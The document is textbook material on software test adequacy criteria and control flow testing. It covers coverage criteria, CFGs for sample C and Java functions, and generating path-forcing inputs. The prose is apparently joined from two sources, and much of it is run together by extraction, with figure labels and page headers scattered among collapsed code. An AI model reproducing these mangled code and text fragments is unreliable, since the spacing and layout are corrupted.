Experience suggests that software that has passed a thorough set of systematic tests is likely to be more dependable than software that has been only superficially or haphazardly tested. Surely we should require that each software module or subsystem undergo thorough, systematic testing before being incorporated into the main product. But what do we mean by thorough testing? What is the criterion by which we can judge the adequacy of a suite of tests that a software artifact has passed?

Ideally, we should like an "adequate" test suite to be one that ensures correctness of the product. Unfortunately, that goal is not attainable. The difficulty of proving that some set of test cases is adequate in this sense is equivalent to the difficulty of proving that the program is correct. In other words, we could have "adequate" testing in this sense only if we could establish correctness without any testing at all.

In practice we settle for criteria that identify inadequacies in test suites. For example, if the specification describes different treatment in two cases, but the test suite does not check that the two cases are in fact treated differently, then we may conclude that the test suite is inadequate to guard against faults in the program logic. If no test in the test suite executes a particular program statement, we might similarly conclude that the test suite is inadequate to guard against faults in that statement. We may use a whole set of (in)adequacy criteria, each of which draws on some source of information about the program and imposes a set of obligations that an adequate set of test cases ought to

satisfy. If a test suite fails to satisfy some criterion, the obligation that has not been satisfied may provide some useful information about improving the test suite. If a set of test cases satisfies all the obligations by all the criteria, we still do not know definitively that it is a well-designed and effective test suite, but we have at least some evidence of its thoroughness.

Test Specifications and Cases

A test case includes not only input data but also any relevant execution conditions and procedures, and a way of determining whether the program has passed or failed the test on a particular execution. The term input is used in a very broad sense, which may include all kinds of stimuli that contribute to determining program behavior. For example, an interrupt is as much an input as is a file. The pass/fail criterion might be given in the form of expected output, but could also be some other way of determining whether a particular program execution is correct.

A test case specification is a requirement to be satisfied by one or more actual test cases. The distinction between a test case specification and a test case is similar to the distinction between a program specification and a program. A test case specification might be met by several different test cases, and vice versa. Suppose, for example, we are testing a program that sorts a sequence of words. "The input is two or more words" would be a test case specification, while test cases with the input values "alpha beta" and "Milano Paris London" would be two among many test cases satisfying the test case specification. A test case with input "Milano Paris London" would satisfy both the test case specification "the input is two or more words" and the test case specification "the input contains a mix of lower- and upper-case alphabetic characters."

Characteristics of the input are not the only thing that might be mentioned in a test case specification. A complete test case specification includes pass/fail criteria for judging test execution and may include requirements, drawn from any of several sources of information, such as system, program, and module interface specifications; source code or detailed design of the program itself; and records of faults encountered in other software systems.

Test specifications drawn from system, program, and module interface specifications often describe program inputs, but they can just as well specify any observable behavior that could appear in specifications. For example, the specification of a database system might require certain kinds of robust failure recovery in case of power loss, and test specifications might therefore require removing system power at certain critical points in processing. If a specification describes inputs and outputs, a test specification could prescribe aspects of the input, the output, or both. If the specification is modeled as an extended finite state machine, it might require executions corresponding to particular transitions or paths in the state-machine model. The general term for such test specifications is functional testing, although the term black-box testing and more specific terms like specification-based testing and model-based testing are also used.

Testing Terms

While the informal meanings of words like "test" may be adequate for everyday conversation, in this context we must try to use terms in a more precise and consistent manner. Unfortunately, the terms we will need are not always used consistently in the literature, despite the existence of an IEEE standard that defines several of them. The terms we will use are defined as follows.

Test case A test case is a set of inputs, execution conditions, and a pass/fail criterion. (This usage follows the IEEE standard.)

Test case specification A test case specification is a requirement to be satisfied by one or more actual test cases. (This usage follows the IEEE standard.)

Test obligation A test obligation is a partial test case specification, requiring some property deemed important to thorough testing. We use the term obligation to distinguish the requirements imposed by a test adequacy criterion from more complete test case specifications.

Test suite A test suite is a set of test cases. Typically, a method for functional testing is concerned with creating a test suite. A test suite for a program, system, or individual unit may be made up of several test suites for individual modules, subsystems, or features. (This usage follows the IEEE standard.)

Test or test execution We use the term test or test execution to refer to the activity of executing test cases and evaluating their results. When we refer to "a test," we mean execution of a single test case, except where context makes it clear that the reference is to execution of a whole test suite. (The IEEE standard allows this and other definitions.)

Adequacy criterion A test adequacy criterion is a predicate that is true (satisfied) or false (not satisfied) of a 〈program, test suite〉 pair. Usually a test adequacy criterion is expressed in the form of a rule for deriving a set of test obligations from another artifact, such as a program or specification. The adequacy criterion is then satisfied if every test obligation is satisfied by at least one test case in the suite.

Test specifications drawn from program source code require coverage of particular elements in the source code or some model derived from it. For example, we might require a test case that traverses a loop one or more times. The general term for testing based on program structure is structural testing, although the term white-box testing or glass-box testing is sometimes used.

Previously encountered faults can be an important source of information regarding useful test cases. For example, if previous products have encountered failures or security breaches due to buffer overflows, we may formulate test requirements

specifically to check handling of inputs that are too large to fit in provided buffers. These fault-based test specifications usually draw also from interface specifications, design models, or source code, but add test requirements that might not have been otherwise considered. A common form of fault-based testing is fault-seeding, purposely inserting faults in source code and then measuring the effectiveness of a test suite in finding the seeded faults, on the theory that a test suite that finds seeded faults is likely also to find other faults.

Test specifications need not fall cleanly into just one of the categories. For example, test specifications drawn from a model of a program might be considered specification- based if the model is produced during program design, or structural if it is derived from the program source code.

Adequacy Criteria

We have already noted that adequacy criteria are just imperfect but useful indicators of inadequacies, so we may not always wish to use them directly to generate test specifications from which actual test cases are drawn. We will use the term test obligation for test specifications imposed by adequacy criteria, to distinguish them from test specifications that are actually used to derive test cases. Thus, the usual situation will be that a set of test cases (a test suite) is created using a set of test specifications, but then the adequacy of that test suite is measured using a different set of test obligations.

We say a test suite satisfies an adequacy criterion if all the tests succeed and if every test obligation in the criterion is satisfied by at least one of the test cases in the test suite. For example, the statement coverage adequacy criterion is satisfied by a particular test suite for a particular program if each executable statement in the program (i.e., excluding comments and declarations) is executed by at least one test case in the test suite. A fault-based adequacy criterion that seeds a certain set of faults would be satisfied if, for each of the seeded faults, there is a test case that passes for the original program but fails for the program with (only) that seeded fault.

It is quite possible that no test suite will satisfy a particular test adequacy criterion for a particular program. For example, if the program contains statements that can never be executed (perhaps because it is part of a sanity check that can be executed only if some other part of the program is faulty), then no test suite can satisfy the statement coverage criterion. Analogous situations arise regardless of the sources of information used in devising test adequacy criteria. For example, a specification-based criterion may require combinations of conditions drawn from different parts of the specification, but not all combinations may be possible.

One approach to overcoming the problem of unsatisfiable test obligations is to simply exclude any unsatisfiable obligation from a criterion. For example, the statement coverage criterion can be modified to require execution only of statements that can be executed. The question of whether a particular statement or program path is

executable, or whether a particular combination of clauses in a specification is satisfiable, or whether a program with a seeded error actually behaves differently from the original program, are all provably undecidable in the general case. Thus, while tools may be some help in distinguishing feasible from infeasible test obligations, in at least some cases the distinction will be left to fallible human judgment.

If the number of infeasible test obligations is modest, it can be practical to identify each of them, and to ameliorate human fallibility through peer review. If the number of infeasible test obligations is large, it becomes impractical to carefully reason about each to avoid excusing an obligation that is feasible but difficult to satisfy. A common practice is to measure the extent to which a test suite approaches an adequacy criterion. For example, if an adequacy criterion based on control flow paths in a program unit induced 100 distinct test obligations, and a test suite satisfied 85 of those obligations, then we would say that we had reached 85% coverage of the test obligations.

Quantitative measures of test coverage are widely used in industry. They are simple and cheap to calculate, provide some indication of progress toward thorough testing, and project an aura of objectivity. In managing software development, anything that produces a number can be seductive. One must never forget that coverage is a rough proxy measure for the thoroughness and effectiveness of test suites. The danger, as with any proxy measure of some underlying goal, is the temptation to improve the proxy measure in a way that does not actually contribute to the goal. If, for example, 80% coverage of some adequacy criterion is required to declare a work assignment complete, developers under time pressure will almost certainly yield to the temptation to design tests specifically to that criterion, choosing the simplest test cases that achieve the required coverage level. One cannot entirely avoid such distortions, but to the extent possible one should guard against them by ensuring that the ultimate measure of performance is preventing faults from surviving to later stages of development or deployment.

Comparing Criteria

It would be useful to know whether one test adequacy criterion was more effective than another in helping find program faults, and whether its extra effectiveness was worthwhile with respect to the extra effort expended to satisfy it. One can imagine two kinds of answers to such a question, empirical and analytical. An empirical answer would be based on extensive studies of the effectiveness of different approaches to testing in industrial practice, including controlled studies to determine whether the relative effectiveness of different testing methods depends on the kind of software being tested, the kind of organization in which the software is developed and tested, and a myriad of other potential confounding factors. The empirical evidence available falls short of providing such clear-cut answers. An analytical answer to questions of relative effectiveness would describe conditions under which one adequacy criterion is guaranteed to be more effective than another, or describe in statistical terms their relative effectiveness.

Control Flow Testing

4.1 BASIC IDEA

Two kinds of basic statements in a program unit are assignment statements andconditional statements. An assignment statement is explicitly represented by usingan assignment symbol, “ = ”, such as x = 2*y;, where x and y are variables.Program conditions are at the core of conditional statements, such as if(), for()loop, while() loop, and goto. As an example, in if(x! = y), we are testing for theinequality of x and y . In the absence of conditional statements, program instructionsare executed in the sequence they appear. The idea of successive execution ofinstructions gives rise to the concept of control flow in a program unit. Conditionalstatements alter the default, sequential control flow in a program unit. In fact,even a small number of conditional statements can lead to a complex control flowstructure in a program.

Function calls are a mechanism to provide abstraction in program design.A call to a program function leads to control entering the called function. Similarly,when the called function executes its return statement, we say that control exitsfrom the function. Though a function can have many return statements, for simplic-ity, one can restructure the function to have exactly one return. A program unit canbe viewed as having a well-defined entry point and a well-defined exit point. Theexecution of a sequence of instructions from the entry point to the exit point of aprogram unit is called a program path . There can be a large, even infinite, numberof paths in a program unit. Each program path can be characterized by an inputand an expected output. A specific input value causes a specific program path to beexecuted; it is expected that the program path performs the desired computation,thereby producing the expected output value. Therefore, it may seem natural toexecute as many program paths as possible. Mere execution of a large number of


88

Control flow graph

4.2 OUTLINE OF CONTROL FLOW TESTING 89

paths, at a higher cost, may not be effective in revealing defects. Ideally, one muststrive to execute fewer paths for better effectiveness.

The concepts of control flow in computer programs [1], program paths [2],and control flow testing [2–8] have been studied for many decades. Tools arebeing developed to support control flow testing [9]. Such tools identify paths froma program unit based on a user-defined criterion, generate the corresponding inputto execute a selected path, and generate program stubs and drivers to execute thetest. Control flow testing is a kind of structural testing, which is performed byprogrammers to test code written by them. The concept is applied to small units ofcode, such as a function. Test cases for control flow testing are derived from thesource code, such as a program unit (e.g., a function or method), rather than fromthe entire program.

Structurally, a path is a sequence of statements in a program unit, whereas,semantically, it is an execution instance of the unit. For a given set of input data,the program unit executes a certain path. For another set of input data, the unit mayexecute a different path. The main idea in control flow testing is to appropriatelyselect a few paths in a program unit and observe whether or not the selected pathsproduce the expected outcome. By executing a few paths in a program unit, theprogrammer tries to assess the behavior of the entire program unit.

4.2 OUTLINE OF CONTROL FLOW TESTING

The overall idea of generating test input data for performing control flow testinghas been depicted in Figure 4.1. The activities performed, the intermediate resultsproduced by those activities, and programmer preferences in the test generationprocess are explained below.

Inputs : The source code of a program unit and a set of path selection criteriaare the inputs to a process for generating test data. In the following, twoexamples of path selection criteria are given.

Example. Select paths such that every statement is executed at least once.

Example. Select paths such that every conditional statement, forexample, an if() statement, evaluates to true and false at least once ondifferent occasions. A conditional statement may evaluate to true in onepath and false in a second path.

Generation of a Control Flow Graph: A control flow graph (CFG) is adetailed graphical representation of a program unit. The idea behind draw-ing a CFG is to be able to visualize all the paths in a program unit. Theprocess of drawing a CFG from a program unit will be explained in thefollowing section. If the process of test generation is automated, a compilercan be modified to produce a CFG.

90 CHAPTER 4 CONTROL FLOW TESTING

Selectpaths

Draw a control flow

graph

Pathselectioncriteria

Test input data

Generatetest input

data

Arethe selected

pathsfeasible?

Programunit

Controlflow graph

Selectedpaths

Inputs

Output

Process of generating test input data

Yes

No

Figure 4.1 Process of generating test input data for control flow testing.

Selection of Paths : Paths are selected from the CFG to satisfy the path selec-tion criteria, and it is done by considering the structure of the CFG.

Generation of Test Input Data: A path can be executed if and only if acertain instance of the inputs to the program unit causes all the conditionalstatements along the path to evaluate to true or false as dictated by thecontrol flow. Such a path is called a feasible path. Otherwise, the path issaid to be infeasible. It is essential to identify certain values of the inputsfrom a given path for the path to execute.

Feasibility Test of a Path: The idea behind checking the feasibility of aselected path is to meet the path selection criteria. If some chosen pathsare found to be infeasible, then new paths are selected to meet the criteria.

4.3 CONTROL FLOW GRAPH

A CFG is a graphical representation of a program unit. Three symbols are usedto construct a CFG, as shown in Figure 4.2. A rectangle represents a sequential

4.3 CONTROL FLOW GRAPH 91

Decision point Merge pointSequential computation

True FalseComputation Decision

Figure 4.2 Symbols in a CFG.

computation. A maximal sequential computation can be represented either by asingle rectangle or by many rectangles, each corresponding to one statement in thesource code.

We label each computation and decision box with a unique integer. The twobranches of a decision box are labeled with T and F to represent the true and falseevaluations, respectively, of the condition within the box. We will not label a mergenode, because one can easily identify the paths in a CFG even without explicitlyconsidering the merge nodes. Moreover, not mentioning the merge nodes in a pathwill make a path description shorter.

We consider the openfiles() function shown in Figure 4.3 to illustrate theprocess of drawing a CFG. The function has three statements: an assignment state-ment int i = 0;, a conditional statement if(), and a return(i) statement. The readermay note that irrespective of the evaluation of the if(), the function performs thesame action, namely, null. In Figure 4.4, we show a high-level representation of

FILE *fptr1, *fptr2, *fptr3; /* These are global variables. */

int openfiles(){/*

This function tries to open files "file1", "file2", and"file3" for read access, and returns the number of filessuccessfully opened. The file pointers of the opened filesare put in the global variables.

*/int i = 0;if(

((( fptr1 = fopen("file1", "r")) != NULL) && (i++)&& (0)) ||

((( fptr2 = fopen("file2", "r")) != NULL) && (i++)&& (0)) ||

((( fptr3 = fopen("file3", "r")) != NULL) && (i++)));return(i);

}

Figure 4.3 Function to open three files.


i = 0 Entry point

if()

return(i)Exit point

1

2

3

T F

Figure 4.4 High-level CFG representation of openfiles().The three nodes are numbered 1, 2, and 3.

the control flow in openfiles() with three nodes numbered 1, 2, and 3. The flowgraph shows just two paths in openfiles().

A closer examination of the condition part of the if() statement reveals thatthere are not only Boolean and relational operators in the condition part, but alsoassignment statements. Some of their examples are given below:

Assignment statements: fptr1 = fopen(“file1”, “r”) and i ++Relational operator: fptr1! = NULL

Boolean operators: && and ||Execution of the assignment statements in the condition part of the if statementdepends upon the component conditions. For example, consider the following com-ponent condition in the if part:

((( fptr1 = fopen("file1", "r")) != NULL) && (i++) && (0))

The above condition is executed as follows:

• Execute the assignment statement fptr1 = fopen(“file1”, “r”).

• Execute the relational operation fptr1! = NULL.

• If the above relational operator evaluates to false, skip the evaluation ofthe subsequent condition components (i++) && (0).

• If the relational operator evaluates to true, then first (i) is evaluated to trueor false. Irrespective of the outcome of this evaluation, the next statementexecuted is (i++).

• If (i) has evaluated to true, then the condition (0) is evaluated. Otherwise,evaluation of (0) is skipped.

In Figure 4.5, we show a detailed CFG for the openfiles() function. Thefigure illustrates a fact that a CFG can take up a complex structure even for asmall program unit.

We give a Java method, called ReturnAverage(), in Figure 4.6. The methodaccepts four parameters, namely value, AS, MIN, and MAX, where value is aninteger array and AS is the maximum size of the array. The array can hold fewernumber of elements than AS; such a scenarion is semantically represented byhaving the value −999 denoting the end of the array. For example, AS = 15,

4.4 PATHS IN A CONTROL FLOW GRAPH 93

fptr2 = fopen("file2", "r")fptr1 = fopen("file1", "r")

i++ i++

iT F

T F

FT

i++ i++

i

0

fptr2 != NULL

i = 0

fptr1 != NULLT F

T

F

i++ i++

i

0

T T

T

F

return(i)

null null

fptr3 = fopen("file3", "r")

fptr3 != NULL

1

2

3

4

5 6

7

8

9

10

11 12

F

13

14

15

16

17

19

18

20

21

F

Figure 4.5 Detailed CFG representation of openfiles(). The numbers 1–21 are the nodes.

whereas the 10th element of the array is −999, which means that there are 10elements—0–9–in the array. MIN and MAX are two integer values that are usedto perform certain computations within the method. The method sums up the valuesof all those elements of the array which fall within the closed range [MIN, MAX],counts their number, and returns their average value. The CFG of the method isshown in Figure 4.7.

4.4 PATHS IN A CONTROL FLOW GRAPH

We assume that a control flow graph has exactly one entry node and exactly oneexit node for the convenience of discussion. Each node is labeled with a unique


public static double ReturnAverage(int value[],int AS, int MIN, int MAX){

/*Function: ReturnAverage Computes the averageof all those numbers in the input array inthe positive range [MIN, MAX]. The maximumsize of the array is AS. But, the array sizecould be smaller than AS in which case the endof input is represented by -999.*/

int i, ti, tv, sum;double av;i = 0; ti = 0; tv = 0; sum = 0;while (ti < AS && value[i] != -999) {

ti++;if (value[i] >= MIN && value[i] <= MAX) {

tv++;sum = sum + value[i];

}i++;

}if (tv > 0)

av = (double)sum/tv;else

av = (double) -999;return (av);

}

Figure 4.6 Function to compute average of selected integers in an array. This program isan adaptation of “Figure 2. A sample program” in ref. 10. (With permission from theAustralian Computer Society.)

integer value. Also, the two branches of a decision node are appropriately labeledwith true (T) or false (F). We are interested in identifying entry–exit paths in aCFG. A path is represented as a sequence of computation and decision nodes fromthe entry node to the exit node. We also specify whether control exits a decisionnode via its true or false branch while including it in a path.

In Table 4.1, we show a few paths from the control flow graph of Figure 4.7.The reader may note that we have arbitrarily chosen these paths without applyingany path selection criterion. We have unfolded the loop just once in path 3, whereaspath 4 unfolds the same loop twice, and these are two distinct paths.

4.5 PATH SELECTION CRITERIA

A CFG, such as the one shown in Figure 4.7, can have a large number of differentpaths. One may be tempted to test the execution of each and every path in a programunit. For a program unit with a small number of paths, executing all the paths may

4.5 PATH SELECTION CRITERIA 95

i = 0, ti = 0, tv = 0, sum =0

ti < AS

value[i] != −999

av = (double)sum/tvav = (double)−999

tv++sum = sum + value[i]

value[i] >= MIN

value[i] <= MAX

tv > 0 TF

F

F

T

T

T

T

F

F

ti++

Initialize: value[], AS MIN, MAX

1

2

3

4

5

6

7

8

11

i++9

10

12

return(av)

13

Figure 4.7 A CFG representation of ReturnAverage(). Numbers 1–13 are the nodes.

TABLE 4.1 Examples of Path in CFG of Figure 4.7

Path 1 1-2-3(F)-10(T)-12-13Path 2 1-2-3(F)-10(F)-11-13Path 3 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13Path 4 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13


be desirable and achievable as well. On the other hand, for a program unit with alarge number of paths, executing every distinct path may not be practical. Thus,it is more productive for programmers to select a small number of program pathsin an effort to reveal defects in the code. Given the set of all paths, one is facedwith a question “What paths do I select for testing?” The concept of path selectioncriteria is useful is answering the above question. In the following, we state theadvantages of selecting paths based on defined criteria:

• All program constructs are exercised at least once. The programmer needsto observe the outcome of executing each program construct, for example,statements, Boolean conditions, and returns.

• We do not generate test inputs which execute the same path repeatedly.Executing the same path several times is a waste of resources. However,if each execution of a program path potentially updates the state of thesystem, for example, the database state, then multiple executions of thesame path may not be identical.

• We know the program features that have been tested and those not tested.For example, we may execute an if statement only once so that it evaluatesto true. If we do not execute it once again for its false evaluation, we are,at least, aware that we have not observed the outcome of the program witha false evaluation of the if statement.

Now we explain the following well-known path selection criteria:

• Select all paths.

• Select paths to achieve complete statement coverage.

• Select paths to achieve complete branch coverage.

• Select paths to achieve predicate coverage.

4.5.1 All-Path Coverage Criterion

If all the paths in a CFG are selected, then one can detect all faults, except thosedue to missing path errors. However, a program may contain a large number ofpaths, or even an infinite number of paths. The small, loop-free openfiles() functionshown in Figure 4.3 contains more than 25 paths. One does not know whether ornot a path is feasible at the time of selecting paths, though only eight of all thosepaths are feasible. If one selects all possible paths in a program, then we say thatthe all-path selection criterion has been satisfied.

Let us consider the example of the openfiles() function. This function tries toopen the three files file1, file2, and file3. The function returns an integer representingthe number of files it has successfully opened. A file is said to be successfullyopened with “read” access if the file exists. The existence of a file is either “yes”or “no.” Thus, the input domain of the function consists of eight combinations ofthe existence of the three files, as shown in Table 4.2.

We can trace a path in the CFG of Figure 4.5 for each input, that is, eachrow of Table 4.2. Ideally, we identify test inputs to execute a certain path in a


TABLE 4.2 Input Domain of openfiles()

Existence of file1 Existence of file2 Existence of file3

No No No

No No Yes

No Yes No

No Yes Yes

Yes No No

Yes No Yes

Yes Yes No

Yes Yes Yes

TABLE 4.3 Inputs and Paths in openfiles()

Input Path

< No, No, No > 1-2-3(F)-8-9(F)-14-15(F)-19-21< Yes, No, No > 1-2-3(T)-4(F)-6-8-9(F)-14-15(F)-19-21< Yes, Yes, Yes > 1-2-3(T)-4(F)-6-8-9(T)-10(T)-11-13(F)-14-15(T)-16(T)-18-20-21

program; this will be explained later in this chapter. We give three examples of thepaths executed by the test inputs (Table 4.3). In this manner, we can identify eightpossible paths in Figure 4.5. The all-paths selection criterion is desirable since itcan detect faults; however, it is difficult to achieve in practice.

4.5.2 Statement Coverage Criterion

Statement coverage refers to executing individual program statements and observ-ing the outcome. We say that 100% statement coverage has been achieved if allthe statements have been executed at least once. Complete statement coverage isthe weakest coverage criterion in program testing. Any test suite that achieves lessthan statement coverage for new software is considered to be unacceptable.

All program statements are represented in some form in a CFG. Referringto the ReturnAverage() method in Figure 4.6 and its CFG in Figure 4.7, the fourassignment statements

i = 0;

ti = 0;

tv = 0;

sum = 0;

have been represented by node 2. The while statement has been represented as aloop, where the loop control condition

(ti < AS && value[i] != -999)


has been represented by nodes 3 and 4. Thus, covering a statement in a programmeans visiting one or more nodes representing the statement, more precisely, select-ing a feasible entry–exit path that includes the corresponding nodes. Since a singleentry–exit path includes many nodes, we need to select just a few paths to coverall the nodes of a CFG. Therefore, the basic problem is to select a few feasiblepaths to cover all the nodes of a CFG in order to achieve the complete statementcoverage criterion. We follow these rules while selecting paths:

• Select short paths.

• Select paths of increasingly longer length. Unfold a loop several times ifthere is a need.

• Select arbitrarily long, “complex” paths.

One can select the two paths shown in Figure 4.4 to achieve complete statementcoverage.

4.5.3 Branch Coverage Criterion

Syntactically, a branch is an outgoing edge from a node. All the rectangle nodeshave at most one outgoing branch (edge). The exit node of a CFG does not have anoutgoing branch. All the diamond nodes have two outgoing branches. Covering abranch means selecting a path that includes the branch. Complete branch coveragemeans selecting a number of paths such that every branch is included in at leastone path.

In a preceding discussion, we showed that one can select two paths, SCPath 1and SCPath 2 in Table 4.4, to achieve complete statement coverage. These twopaths cover all the nodes (statements) and most of the branches of the CFG shownin Figure 4.7. The branches which are not covered by these two paths have beenhighlighted by bold dashed lines in Figure 4.8. These uncovered branches corre-spond to the three independent conditions

value[i] != -999

value[i] >= MIN

value[i] <= MAX

evaluating to false. This means that as a programmer we have not observed theoutcome of the program execution as a result of the conditions evaluating to false.Thus, complete branch coverage means selecting enough number of paths such thatevery condition evaluates to true at least once and to false at least once.

We need to select more paths to cover the branches highlighted by the bolddashed lines in Figure 4.8. A set of paths for complete branch coverage is givenin Table 4.5.

TABLE 4.4 Paths for Statement Coverage of CFG of Figure 4.7

SCPath 1 1-2-3(F)-10(F)-11-13SCPath 2 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13


i = 0, ti = 0, tv = 0, sum = 0

ti < AS

value[i] != −999

av = (double)sum/tvav = (double)−999


value[i] >= MIN

value[i] <= MAX

tv > 0 TF

F

F

T

T

T

T

F

F

ti++

Initialize: value[], AS MIN, MAX

1

2

3

4

5

6

7

8

11

i++9

10

12

return(av)

13

Figure 4.8 Dashed arrows represent the branches not covered by statement coveringin Table 4.4.

TABLE 4.5 Paths for Branch Coverage of CFG of Figure 4.7

BCPath 1 1-2-3(F)-10(F)-11-13BCPath 2 1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13BCPath 3 1-2-3(T)-4(F)-10(F)-11-13BCPath 4 1-2-3(T)-4(T)-5-6(F)-9-3(F)-10(F)-11-13BCPath 5 1-2-3(T)-4(T)-5-6(T)-7(F)-9-3(F)-10(F)-11-13


4.5.4 Predicate Coverage Criterion

We refer to the partial CFG of Figure 4.9a to explain the concept of predicatecoverage. OB1, OB2, OB3, and OB are four Boolean variables. The programcomputes the values of the individual variables OB1, OB2, and OB3— details oftheir computation are irrelevant to our discussion and have been omitted. Next, OBis computed as shown in the CFG. The CFG checks the value of OB and executeseither OBlock1 or OBlock2 depending on whether OB evaluates to true or false,respectively.

We need to design just two test cases to achieve both statement coverageand branch coverage. We select inputs such that the four Boolean conditions inFigure 4.9a evaluate to the values shown in Table 4.6. The reader may note thatwe have shown just one way of forcing OB to true. If we select inputs so that thesetwo cases hold, then we do not observe the effect of the computations taking placein nodes 2 and 3. There may be faults in the computation parts of nodes 2 and 3such that OB2 and OB3 always evaluate to false.

T F

(b)

T F

(a)

OBlock2OBlock1 ABlock2ABlock1

Compute OB1

Compute OB2

Compute OB3

if(OB)

OB = OB1 || OB2 || OB3

Compute AB1

Compute AB2

Compute AB3

if(AB)

AB = AB1 && AB2 && AB3

1

3

2

4

6 7

1

2

3

4

55

76

Figure 4.9 Partial CFG with (a) OR operation and (b) AND operation.

4.6 GENERATING TEST INPUT 101

TABLE 4.6 Two Cases for Complete Statementand Branch Coverage of CFG of Figure 4.9a

Cases OB1 OB2 OB3 OB

1 T F F T

2 F F F F

Therefore, there is a need to design test cases such that a path is executedunder all possible conditions. The False branch of node 5 (Figure 4.9a) is executedunder exactly one condition, namely, when OB1 = False, OB2 = False, and OB3 =False, whereas the true branch executes under seven conditions. If all possiblecombinations of truth values of the conditions affecting a selected path have beenexplored under some tests, then we say that predicate coverage has been achieved.Therefore, the path taking the true branch of node 5 in Figure 4.9a must be executedfor all seven possible combinations of truth values of OB1, OB2, and OB3 whichresult in OB = True.

A similar situation holds for the partial CFG shown in Figure 4.9b, whereAB1, AB2, AB3, and AB are Boolean variables.

4.6 GENERATING TEST INPUT

In Section 4.5 we explained the concept of path selection criteria to cover certainaspects of a program with a set of paths. The program aspects we consideredwere all statements, true and false evaluations of each condition, and combinationsof conditions affecting execution of a path. Now, having identified a path, thequestion is how to select input values such that when the program is executedwith the selected inputs, the chosen paths get executed. In other words, we needto identify inputs to force the executions of the paths. In the following, we definea few terms and give an example of generating test inputs for a selected path.

1. Input Vector: An input vector is a collection of all data entities read bythe routine whose values must be fixed prior to entering the routine. Members ofan input vector of a routine can take different forms as listed below:

• Input arguments to a routine

• Global variables and constants

• Files

• Contents of registers in assembly language programming

• Network connections

• Timers

A file is a complex input element. In one case, mere existence of a file can beconsidered as an input, whereas in another case, contents of the file are considered


to be inputs. Thus, the idea of an input vector is more general than the concept ofinput arguments of a function.

Example. An input vector for openfiles() (Figure 4.3) consists of individual pres-ence or absence of the files file1, file2, and file3.

Example. The input vector of the ReturnAverage() method shown in Figure 4.6is < value [], AS, MIN, MAX > .

2. Predicate: A predicate is a logical function evaluated at a decision point.

Example. The construct ti < AS is the predicate in decision node 3 of Figure 4.7.

Example. The construct OB is the predicate in decision node 5 of Figure 4.9.

3. Path Predicate: A path predicate is the set of predicates associated witha path.

The path in Figure 4.10 indicates that nodes 3, 4, 6, 7, and 10 are deci-sion nodes. The predicate associated with node 3 appears twice in the path; inthe first instance it evaluates to true and in the second instance it evaluates tofalse. The path predicate associated with the path under consideration is shown inFigure 4.11.

We also specify the intended evaluation of the component predicates as foundin the path specification. For instance, we specify that value[i] ! = −999 mustevaluate to true in the path predicate shown in Figure 4.11. We keep this additionalinformation for the following two reasons:

• In the absence of this additional information denoting the intended evalu-ation of a predicate, we will have no way to distinguish between the twoinstances of the predicate ti < AS, namely 3(T) and 3(F), associated withnode 3.

1-2-3(T)-4(T)-5-6(T)-7(T)-8-9-3(F)-10(T)-12-13

Figure 4.10 Example of a path from Figure 4.7.

ti < AS ≡ Truevalue[i] != -999 ≡ Truevalue[i] >= MIN ≡ Truevalue[i] <= MAX ≡ True

ti < AS ≡ Falsetv > 0 ≡ True

Figure 4.11 Path predicate for path in Figure 4.10.


• We must know whether the individual component predicates of a pathpredicate evaluate to true or false in order to generate path forcing inputs.

4. Predicate Interpretation: The path predicate shown in Figure 4.11 is com-posed of elements of the input vector < value[], AS, MIN, MAX >, a vector oflocal variables < i, ti, tv >, and the constant −999. The local variables are notvisible outside a function but are used to

• hold intermediate results,

• point to array elements, and

• control loop iterations.

In other words, they play no roles in selecting inputs that force the paths to execute.Therefore, we can easily substitute all the local variables in a predicate with theelements of the input vector by using the idea of symbolic substitution. Let usconsider the method shown in Figure 4.12. The input vector for the method inFigure 4.12 is given by < x1, x2 > . The method defines a local variable y and alsouses the constants 7 and 0.

The predicate

x1 + y >= 0

can be rewritten as

x1 + x2 + 7 >= 0

by symbolically substituting y with x 2 + 7. The rewritten predicate

x1 + x2 + 7 >= 0

has been expressed solely in terms of the input vector < x1,x2 > and the constantvector < 0,7 > . Thus, predicate interpretation is defined as the process of symbol-ically substituting operations along a path in order to express the predicates solelyin terms of the input vector and a constant vector.

In a CFG, there may be several different paths leading up to a decision pointfrom the initial node, with each path doing different computations. Therefore, apredicate may have different interpretations depending on how control reaches thepredicate under consideration.

public static int SymSub(int x1, int x2){int y;y = x2 + 7;if (x1 + y >= 0)

return (x2 + y);else return (x2 - y);}

Figure 4.12 Method in Java to explain symbolic substitution [11].


5. Path Predicate Expression: An interpreted path predicate is called a pathpredicate expression. A path predicate expression has the following properties:

• It is void of local variables and is solely composed of elements of the inputvector and possibly a vector of constants.

• It is a set of constraints constructed from the elements of the input vectorand possibly a vector of constants.

• Path forcing input values can be generated by solving the set of constraintsin a path predicate expression.

• If the set of constraints cannot be solved, there exist no input which cancause the selected path to execute. In other words, the selected path is saidto be infeasible.

• An infeasible path does not imply that one or more components of a pathpredicate expression are unsatisfiable. It simply means that the total combi-nation of all the components in a path predicate expression is unsatisfiable.

• Infeasibility of a path predicate expression suggests that one considers otherpaths in an effort to meet a chosen path selection criterion.

Example. Consider the path shown in Figure 4.10 from the CFG of Figure 4.7.Table 4.7 shows the nodes of the path in column 1, the corresponding descriptionof each node in column 2, and the interpretation of each node in column 3. The

TABLE 4.7 Interpretation of Path Predicate of Path in Figure 4.10.

Node Node Description Interpreted Description

1 Input vector:

< value[], AS, MIN, MAX >

2 i = 0, ti = 0,

tv = 0, sum = 0

3(T) ti < AS 0 < AS

4(T) value[i]! = − 999 value[0]! = − 999

5 ti++ ti = 0 + 1 = 1

6(T) value[i] > = MIN value[0] > = MIN

7(T) value[i] < = MAX value[0] < = MAX

8 tv++ tv = 0 + 1 = 1

sum = sum + value[i] sum = 0 + value[0]

= value[0]

9 i++ i = 0 + 1 = 1

3(F) ti < AS 1 < AS

10(T) tv > 0 1 > 0

12 av = (double) sum/tv av = (double) value[0]/1

13 return(av) return(value[0])

Note: The bold entries in column 1 denote interpreted predicates.


intended evaluation of each interpreted predicate can be found in column 1 of thesame row.

